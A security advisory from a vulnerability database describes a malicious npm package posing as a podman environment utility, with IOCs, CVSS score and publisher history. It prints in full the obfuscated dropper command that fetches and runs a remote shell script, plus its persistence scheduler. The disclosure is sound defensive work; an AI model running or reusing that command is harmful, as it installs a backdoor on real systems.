VDB
GCVE-110-OSM-2026-6491
GCVE-110-OSM-2026-6491
Advisory PublishedCVSS 8.8/10
The package contains a string-concatenation obfuscation in `index.js` that assembles and executes `bash <(curl -Ls https://gbjs.serv00.net/nezha.sh)` — a classic fetch-and-execute dropper pattern. The obfuscated command is run inside `monitorProcesses()`, which fires every 5 minutes via a scheduler, ensuring persistence and re-execution if the payload process disappears. The domain `gbjs.serv00.net` is confirmed as an IOC, and the IOC IP `128.204.223.94` is likely the same infrastructure. The publisher `liming2038` has a prior malicious package (`kisama-js`, OSM threat 067f90e5) with the same account only 313 days old, confirming a serial threat actor. The attacker model is a persistent backdoor dropper that masquerades as a podman environment utility, fetching and running the Nezha monitoring agent or a trojanized variant as a C2 implant.
ENTRY
index.js (bin: index.js)
ADDITIONAL FINDINGS
- Shell Command Execution in index.js: "require('child_process')"
- Publisher Has Other Malicious Packages
- Rapid Version Publishing
PAYLOAD FILES
index.js
INDICATORS (IOCs)
- ipv4: 128.204.223.94
- domains: gbjs.serv00.net
- payloadFileHash: cd05b5e7f5c6b0ceb4c9f4a7ffbac202309b2706474815c497146e491f7ebbac
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @baipiaodajun/podman_env | all (affected) | — |
Browse GCVE Records
73,118 records in the GCVE database · Updated July 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.